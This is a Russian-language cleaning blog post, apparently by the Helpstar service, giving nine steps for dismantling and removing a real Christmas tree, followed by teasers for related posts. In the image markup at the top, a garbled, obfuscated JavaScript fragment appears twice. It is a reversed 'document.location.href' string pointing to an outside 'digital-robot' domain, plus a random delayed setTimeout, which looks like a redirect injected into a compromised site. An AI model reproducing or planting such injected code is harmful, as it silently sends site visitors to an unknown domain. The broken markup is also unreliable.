Ни иголочки: убираем елку после новогодних праздников быстро и аккуратно

tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to-188971-1024x4211.jpeg">tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to-188971-1024x4211.jpeg" alt="Как правильно разобрать и вынести елку" width="713" height="419" />

Новогодняя елочка — традиционный элемент новогоднего украшения дома. Искусственные деревья, аппликации на стены, футуристические конструкции из металла или пластика — в моду входят различные варианты праздничного декора. Но, конечно, традиционные живые ели, пихты и сосны радуют больше всего. И они же приносят больше всего хлопот.

Разобрать искусственную елку просто: нужно аккуратно сверху вниз снять с нее игрушки, разобрать само дерево и сложить все это в коробки для хранения. А вот чтобы разбор и вынос живой ели не привел к хаосу в доме, стои следовать нескольким правилам.

  1. Уберите все ковры
    Елочные иголки быстро впиваются в мягкие поверхности и держатся там долго. Уберите из комнаты с ёлкой и пола на пути к входной двери все ковры, чтобы на них не попали осыпавшиеся иголки.

  2. Закройте пол
    Пол застелите газетами или ненужной простыней. Если у вас ковровое покрытие, то постарайтесь сделать слой газет двойным.

  3. Приготовьте упаковку
    Вам понадобится большие мусорные мешки — например, на 120 л. Маленькую елочку можно сразу опустить в мешок и снимать игрушки уже над ним. Так большинство иголок упадет сразу в него и вам останется только натянуть пакет на дерево и вынести его.

  4. Снимите игрушки
    Игрушки лучше снимать снизу вверх по кругу — так они будут меньше засыпаны иголками.

  5. Обрежьте ветви
    Если ёлка достаточно большая и пушистая, вынести ее целиком будет сложно. Лучше взять большие ножницы или секатор и обрезать крупные ветви так, чтобы ствол остался почти голым. Сложите обрезанные ветви в отдельный пакет.

  6. Плотно упакуйте дерево
    На оставшийся ствол наденьте мусорные пакеты сверху и снизу, закрепите их скотчем или веревкой. Отнесите к входной двери вместе с пакетом с ветками.

  7. Соберите газеты вместе с иголками
    Аккуратно сверните покрытые осыпавшейся хвоей газеты, двигаясь от конца комнаты к двери, и тоже сложите в мусорный пакет.

  8. Очистите пол от остатка иголок
    Если вы следовали нашему плану, то на полу осталось совсем немного иголочек. Сметите их щеткой, а потом пройдитесь по комнате пылесосом — так вы избавитесь от всего мелкого мусора.

  9. Не выбрасывайте елку просто так
    Многие просто выносят ёлочки к мусорным бакам во дворе и оставляют их там, но это не самое правильное решение. Лучше сдать дерево на утилизацию или зоопарк, где ее превратят в удобрения, корм для животных или еще что-нибудь полезное. Так вы будете знать, что новогодний символ не только принес вам радость, но и дальше оказался полезным.

Следуйте нашим советам и в вашей квартире не останется ни иголочки. А чтобы окончательно не стирать ощущение праздника уборкой всего дома — просто сделайте заказ в Helpstar. Наши специалисты с удовольствием помогут привести квартиру в порядок после праздников и проследят за тем, чтобы в ней было чисто и уютно.

Всё прозрачно: пять главных «не» о мытье окон

Всё прозрачно: пять главных «не» о мытье окон

Зима уже окончательно отступила, лето не за горами, а значит, пора приступать к мытью окон. Рассказываем, как это сделать оперативно и эффективно, собрав самые популярные правила и советы экспертов Helpstar....
8 апреля 2019
Тепло, приди: лайфхаки для придания дому уюта и тепла зимой

Тепло, приди: лайфхаки для придания дому уюта и тепла зимой

Это только кажется, что с наступлением февраля тепло вроде как не за горами. Но последний зимний месяц, да и чего уж там, первый весенний долгожданным теплом вовсе не балуют. Вместо солнца и плюса за окном к нам приходят пронизывающие ветра и снегопады....
7 февраля 2019

После праздника: как аккуратно убрать новогоднюю елку из квартиры

Череда новогодних праздников вот-вот закончится, а значит, с главным символом Нового года придётся попрощаться. Хорошо если елка искусственная — на её разбор и упаковку уйдёт не так много времени, а вот с настоящей ёлкой придётся повозиться. Выясняем, как...
11 января 2019

Обратный
звонок